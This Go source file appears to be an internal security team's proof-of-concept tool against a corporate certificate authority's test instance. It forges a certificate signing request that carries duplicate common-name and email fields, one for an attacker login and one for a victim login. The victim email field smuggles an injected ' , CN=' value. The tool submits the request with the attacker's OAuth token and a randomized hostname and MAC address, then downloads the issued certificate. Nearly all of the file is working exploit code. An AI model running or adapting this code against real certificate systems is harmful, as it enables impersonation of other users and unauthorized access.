package certor

import (
	"bytes"
	"crypto/rand"
	"crypto/rsa"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/asn1"
	"encoding/json"
	"encoding/pem"
	"fmt"
	"io/ioutil"
	"net/http"

	"a.yandex-team.ru/library/go/core/xerrors"
	"a.yandex-team.ru/security/libs/go/yahttp"
)

type (
	GenRequest struct {
		OAuthToken  string
		EvilLogin   string
		VictimLogin string
	}

	GenResponse struct {
		KeyPem []byte
		CsrPem []byte
		PubPem []byte
	}
)

func GenCertificates(req GenRequest) (*GenResponse, error) {
	keyPEM, csrPEM, err := createCsr(req.EvilLogin, req.VictimLogin)
	if err != nil {
		return nil, xerrors.Errorf("failed to create csr: %w", err)
	}

	pubUrl, err := requestCrt(req.OAuthToken, csrPEM)
	if err != nil {
		return nil, xerrors.Errorf("failed to request certificate: %w", err)
	}

	pubPEM, err := downloadCrt(req.OAuthToken, pubUrl)
	if err != nil {
		return nil, xerrors.Errorf("failed to download certificate: %w", err)
	}

	return &GenResponse{
		CsrPem: csrPEM,
		PubPem: pubPEM,
		KeyPem: keyPEM,
	}, nil
}

func createCsr(evilLogin, victimLogin string) ([]byte, []byte, error) {
	certKey, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return nil, nil, err
	}

	csrEmailFake := pkix.AttributeTypeAndValue{
		Type:  asn1.ObjectIdentifier{1, 2, 840, 113549, 1, 9, 1},
		Value: fmt.Sprintf("%s@ld.yandex.ru", evilLogin),
	}

	csrEmailReal := pkix.AttributeTypeAndValue{
		Type:  asn1.ObjectIdentifier{1, 2, 840, 113549, 1, 9, 1},
		Value: fmt.Sprintf(" , CN=%s@ld.yandex.ru", victimLogin),
	}

	commonNameFake := pkix.AttributeTypeAndValue{
		Type:  asn1.ObjectIdentifier{2, 5, 4, 3},
		Value: fmt.Sprintf("%s@ld.yandex.ru", evilLogin),
	}

	commonNameReal := pkix.AttributeTypeAndValue{
		Type:  asn1.ObjectIdentifier{2, 5, 4, 3},
		Value: fmt.Sprintf("%s@ld.yandex.ru", victimLogin),
	}

	template := &x509.CertificateRequest{
		SignatureAlgorithm: x509.SHA256WithRSA,
		PublicKeyAlgorithm: x509.RSA,
		PublicKey:          &certKey.PublicKey,
		Subject: pkix.Name{
			ExtraNames: []pkix.AttributeTypeAndValue{
				commonNameFake,
				commonNameReal,
				csrEmailFake,
				csrEmailReal,
			},
		},
	}
	csrDER, err := x509.CreateCertificateRequest(rand.Reader, template, certKey)
	if err != nil {
		return nil, nil, err
	}

	pemEncode := func(b []byte, t string) []byte {
		return pem.EncodeToMemory(&pem.Block{Bytes: b, Type: t})
	}

	keyPEM := pemEncode(x509.MarshalPKCS1PrivateKey(certKey), "RSA PRIVATE KEY")
	csrPEM := pemEncode(csrDER, "CERTIFICATE REQUEST")

	return keyPEM, csrPEM, nil
}

func requestCrt(token string, csr []byte) (uri string, err error) {
	b, err := json.Marshal(map[string]string{
		"type":        "linux-pc",
		"ca_name":     "InternalTestCA",
		"request":     string(csr),
		"pc_hostname": randHost(),
		"pc_os":       "linux",
		"pc_mac":      randMac(),
	})

	if err != nil {
		return
	}

	req, err := http.NewRequest(
		"POST",
		"https://crt.test.yandex-team.ru/api/certificate/",
		bytes.NewBuffer(b),
	)
	if err != nil {
		return
	}

	req.Header.Set("Content-Type", "application/json")
	req.Header.Set("Authorization", fmt.Sprintf("OAuth %s", token))
	resp, err := yahttp.DefaultClient.Do(req)
	if err != nil {
		return
	}
	defer yahttp.GracefulClose(resp.Body)

	if resp.StatusCode != 201 {
		bb, _ := ioutil.ReadAll(resp.Body)
		err = fmt.Errorf("failed to create request crt (%d): %s", resp.StatusCode, string(bb))
		return
	}

	bb, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		return
	}

	var crtResp struct {
		Url string `json:"download2"`
	}
	err = json.Unmarshal(bb, &crtResp)
	if err != nil {
		return
	}
	return crtResp.Url, nil
}

func downloadCrt(token, uri string) (res []byte, err error) {
	req, err := http.NewRequest("GET", uri, nil)
	if err != nil {
		return
	}

	req.Header.Set("Authorization", fmt.Sprintf("OAuth %s", token))
	resp, err := yahttp.DefaultClient.Do(req)
	if err != nil {
		return
	}
	defer yahttp.GracefulClose(resp.Body)

	if resp.StatusCode != 200 {
		bb, _ := ioutil.ReadAll(resp.Body)
		return nil, fmt.Errorf("failed to download crt (%d): %s", resp.StatusCode, string(bb))
	}

	bb, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		return
	}

	return bb, nil
}
